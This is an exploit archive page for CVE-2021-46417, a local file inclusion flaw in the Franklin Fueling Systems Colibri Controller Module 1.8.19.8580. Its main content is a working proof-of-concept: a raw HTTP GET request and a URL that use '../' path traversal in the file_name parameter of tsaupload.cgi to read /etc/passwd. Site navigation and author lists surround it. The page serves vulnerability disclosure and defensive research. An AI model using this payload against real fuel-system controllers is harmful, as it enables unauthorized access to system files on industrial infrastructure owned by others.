Franklin Fueling Systems Colibri Controller Module 1.8.19.8580 Local File Inclusion

Franklin Fueling Systems Colibri Controller Module 1.8.19.8580 Local File Inclusion: Posted Apr 11, 2022; Authored by Momen Eldawakhly; Franklin Fueling Systems Colibri Controller Module version 1.8.19.8580 suffers from a local file inclusion vulnerability.; tags | exploit, local, file inclusion; advisories | CVE-2021-46417; SHA-256 | f45a40ee7fe8f2f856deb113c48a0f102823cf6b887757553709163f470b6fe5; Download | Favorite | View

Franklin Fueling Systems Colibri Controller Module 1.8.19.8580 Local File Inclusion

# Exploit Title: Franklin Fueling Systems Colibri Controller Module 1.8.19.8580 - Local File Inclusion (LFI)
# Date: 7/4/2022
# Exploit Author: Momen Eldawakhly (Cyber Guy)
# Vendor Homepage: https://www.franklinfueling.com/
# Version: 1.8.19.8580
# Tested on: Linux [Firefox]
# CVE : CVE-2021-46417

# Proof of Concept

============[ HTTP Exploitation ]============

GET /18198580/cgi-bin/tsaupload.cgi?file_name=../../../../../..//etc/passwd&password= HTTP/1.1
Host: 192.168.1.6
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: Prefs=LID%3Des%3BPDS%3DMM/dd/yyyy%3BPDL%3DEEEE%2C%20MMMM%20dd%2C%20yyyy%3BPDY%3DMMMM%2C%20yyyy%3BPTS%3DHH%3Amm%3BPTL%3DHH%3Amm%3Ass%3BDSP%3D.%3BGSP%3D%2C%3BGRP%3D3%3BLDZ%3Dtrue%3BUVL%3DuvGallons%3BULN%3DulMillimeters%3BUTM%3DutCentigrade%3BUPR%3DupPSI%3BUP2%3Dup2inWater%3BUP3%3Dup3inHg%3BUFL%3Dufgpm%3BUDY%3Dudkgpcm%3BUMS%3Dumkgrams%3BRPR%3D30%3BXML%3Dfalse%3B
Upgrade-Insecure-Requests: 1

============[ URL Exploitation ]============

http://192.168.1.6/18198580/cgi-bin/tsaupload.cgi?file_name=../../../../../..//etc/passwd&password=

Top Authors In Last 30 Days

Red Hat 261 files
Ubuntu 106 files
indoushka 23 files
Debian 20 files
Gentoo 14 files
Google Security Research 13 files
CraCkEr 11 files
Mirabbas Agalarov 9 files
Apple 8 files
Ivan Fratric 7 files

File Archives

Systems

AIX (428)
Apple (1,979)
BSD (373)
CentOS (57)
Cisco (1,920)
Debian (6,755)
Fedora (1,691)
FreeBSD (1,244)
Gentoo (4,321)
HPUX (879)
iOS (344)
iPhone (108)
IRIX (220)
Juniper (67)
Linux (45,851)
Mac OS X (685)
Mandriva (3,105)
NetBSD (256)
OpenBSD (482)
RedHat (13,365)
Slackware (941)
Solaris (1,610)
SUSE (1,444)
Ubuntu (8,645)
UNIX (9,245)
UnixWare (186)
Windows (6,555)
Other

Franklin Fueling Systems Colibri Controller Module 1.8.19.8580 Local File Inclusion

Franklin Fueling Systems Colibri Controller Module 1.8.19.8580 Local File Inclusion

File Archive:

June 2023

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Franklin Fueling Systems Colibri Controller Module 1.8.19.8580 Local File Inclusion

Share This

Franklin Fueling Systems Colibri Controller Module 1.8.19.8580 Local File Inclusion

File Archive:

June 2023

Top Authors In Last 30 Days

File Tags

File Archives

Systems